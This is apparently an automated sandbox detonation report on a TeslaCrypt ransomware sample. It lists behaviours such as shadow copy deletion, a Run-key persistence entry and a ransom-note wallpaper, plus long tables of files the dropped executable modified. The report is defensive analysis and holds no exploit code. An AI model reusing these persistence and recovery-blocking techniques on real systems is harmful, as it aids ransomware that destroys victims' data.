Analysis Overview
SHA256
3b246faa7e4b2a8550aa619f4da893db83721aacf62b46e5863644a5249aa87e
Threat Level: Known bad
The file Ransomware.TeslaCrypt.zip was found to be: Known bad.
Malicious Activity Summary
Renames multiple (6004) files with added filename extension
Renames multiple (735) files with added filename extension
Deletes shadow copies
Renames multiple (374) files with added filename extension
Renames multiple (359) files with added filename extension
Renames multiple (4011) files with added filename extension
Drops file in Drivers directory
Executes dropped EXE
Loads dropped DLL
Checks computer location settings
Deletes itself
Reads user/profile data of web browsers
Enumerates connected drives
Adds Run key to start application
Looks up external IP address via web service
Indicator Removal: File Deletion
Drops file in System32 directory
Sets desktop wallpaper using registry
Suspicious use of SetThreadContext
Drops file in Windows directory
Drops file in Program Files directory
Unsigned PE
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Uses Volume Shadow Copy service COM API
Interacts with shadow copies
Suspicious use of SetWindowsHookEx
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates system info in registry
Checks processor information in registry
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer settings
Modifies Control Panel
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-14 05:42
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-14 05:42
Reported
2024-11-14 05:44
Platform
win10ltsc2021-20241023-en
Max time kernel
82s
Max time network
88s
Command Line
Signatures
Renames multiple (6004) files with added filename extension
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\drivers\gmreadme.txt | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\crypto13 = "C:\\Users\\Admin\\AppData\\Roaming\\hugufdp.exe" | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
Indicator Removal: File Deletion
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\es-ES\PSDSCxMachine.strings.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\TrustedPlatformModule\TrustedPlatformModule.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Licenses\neutral\_Default\EnterpriseS\license.rtf | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BranchCache\BranchCache.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\ISE\ise.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_PackageResource\de-DE\PackageProvider.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_ProcessResource\en-US\MSFT_ProcessResource.strings.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_ProcessResource\uk-UA\MSFT_ProcessResource.strings.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\NetQos\NetQos.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_ScriptResource\de-DE\MSFT_ScriptResourceStrings.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\DefaultAccountTile.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\es-ES\lpeula.rtf | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\it-IT\lpeula.rtf | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\ja-JP\Licenses\Volume\EnterpriseS\license.rtf | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\fr-FR\Microsoft.PowerShell.ODataUtilsStrings.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\NetNat\NetNat.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_UserResource\it-IT\MSFT_UserResource.strings.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\DesktopSpotlightToastIcon_Light.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\ja-JP\Licenses\OEM\EnterpriseS\license.rtf | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AssignedAccess\it-IT\AssignedAccessMsg.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Storage\Storage.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\prnms009.inf_amd64_c60443fdc3285a98\MPDW-constraints.js | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_GroupResource\uk-UA\MSFT_GroupResource.strings.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_PackageResource\ja-JP\PackageProvider.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_ServiceResource\de-DE\MSFT_ServiceResource.strings.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Licenses\neutral\Volume\EnterpriseS\license.rtf | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\MailContactsCalendarSync\LiveDomainList.txt | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\SecurityAndMaintenance_Alert.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\uk-UA\lipeula.rtf | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\fr-FR\BitLocker.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_GroupResource\de-DE\MSFT_GroupResource.strings.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\fr-FR\Licenses\OEM\EnterpriseS\license.rtf | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\IntegratedServicesRegionPolicySet.json | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\Microsoft.PowerShell.ODataUtilsStrings.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\MsDtc\ja-JP\TestDtc.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCClassResources\WindowsPackageCab\WindowsPackageCab.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsUpdate\WindowsUpdate.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_RoleResource\en-US\MSFT_RoleResourceStrings.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\@EnrollmentToastIcon.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\default.help.txt | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PrintManagement\PrintManagement.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\de-DE\BitLocker.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\MsDtc\MsDtc.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\es-ES\RunAsHelper.strings.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\@AppHelpToast.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\System32\LogFiles\WMI\Diagtrack-Listener.etl.001 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Licenses\neutral\OEM\EnterpriseS\license.rtf | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_RegistryResource\uk-UA\MSFT_RegistryResource.strings.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\fr-FR\PSDesiredStateConfiguration.Resource.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\WebDownloadManager\WebDownloadManager.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\de-DE\lpeula.rtf | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Licenses\neutral\OEM\EnterpriseS\de-license.rtf | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security\Microsoft.PowerShell.Security.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_ArchiveResource\es-ES\ArchiveProvider.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_RegistryResource\it-IT\MSFT_RegistryResource.strings.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_ScriptResource\uk-UA\MSFT_ScriptResourceStrings.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\it-IT\Licenses\Volume\EnterpriseS\license.rtf | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\System32\LogFiles\WMI\CloudExperienceHostOobe.etl.001 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_ArchiveResource\fr-FR\ArchiveProvider.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_EnvironmentResource\fr-FR\MSFT_EnvironmentResource.strings.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_WindowsOptionalFeature\es-ES\MSFT_WindowsOptionalFeature.strings.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\de-DE\Licenses\_Default\EnterpriseS\license.rtf | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\AppvClient.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\HELP_TO_DECRYPT_YOUR_FILES.bmp" | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\km.pak | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\ca.pak | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\gu.pak | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\es-419.pak | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ne.txt | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\HintBarEllipses.16.White.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\Windows NT\TableTextService\TableTextServiceDaYi.txt | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\Xusage.txt | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-100.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.scale-140.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.scale-180.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\en-US.pak.DATA | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\fa.pak.DATA | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\ClientSub2019_eula.txt | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\PlatformCapabilities\CommonCapabilities.json | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\en-US\PackageManagementDscUtilities.strings.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-black_scale-80.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\VisualElements\SmallLogoCanary.png.DATA | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\ja-JP\MSFT_PackageManagement.strings.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\lib\security\blacklisted.certs | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-moreimages.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\it.pak.DATA | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\AugLoop\third-party-notices.txt | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.scale-140.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\ur.pak | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\VisualElements\SmallLogo.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-white_scale-180.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\CancelFluent.White.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\fr-FR\MSFT_PackageManagement.strings.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\msedge_100_percent.pak | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ku-ckb.txt | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-white_scale-140.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-black_scale-80.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-white_scale-80.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-black_scale-100.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\Microsoft.NETCore.App.runtimeconfig.json | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\ja.pak | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagementSource\ja-JP\MSFT_PackageManagementSource.strings.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jmc.txt | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\en-US\about_BeforeEach_AfterEach.help.txt | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\resources.pak.DATA | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\hi.pak | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\VisualElements\LogoCanary.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\mecontrol.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\Microsoft.WindowsDesktop.App.deps.json | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\PlatformCapabilities\WordCapabilities.json | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagementSource\de-DE\MSFT_PackageManagementSource.strings.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\gl.txt | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sw.txt | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PersonaSpy\notice.txt | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\ca-Es-VALENCIA.pak | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\hu.pak | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\es.pak.DATA | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\en-US\MSFT_PackageManagement.strings.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\es-419.pak | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-white_scale-100.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\de.pak.DATA | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\Microsoft.WindowsDesktop.App.deps.json | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\security\blacklisted.certs | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\en-US\about_should.help.txt | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_microsoft-windows-l..erprisegn.resources_31bf3856ad364e35_10.0.19041.4529_en-us_8a581914d7661aed\f\license.rtf | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.3636_none_3473be4cdeacc98a\f\divider.css | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-c..erymanager.appxmain_31bf3856ad364e35_10.0.19041.4355_none_20749689b588f6b3\Splashscreen.scale-100.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-fileexplorer.appxmain_31bf3856ad364e35_10.0.19041.546_none_476476bb5c3a0bbc\SquareTile44x44.scale-400.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-s..ast-black.searchapp_31bf3856ad364e35_10.0.19041.1_none_e479c512c8bfeb66\AppListIcon.targetsize-20_altform-unplated.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-ui-shell-component_31bf3856ad364e35_10.0.19041.4355_none_c25ba12abfc23968\RequestedDownloadsLargeCloudIcon.contrast-white_scale-400.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_microsoft-windows-ecapp.appxmain_31bf3856ad364e35_10.0.19041.4474_none_71c1b099416624ca\f\cursordot.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
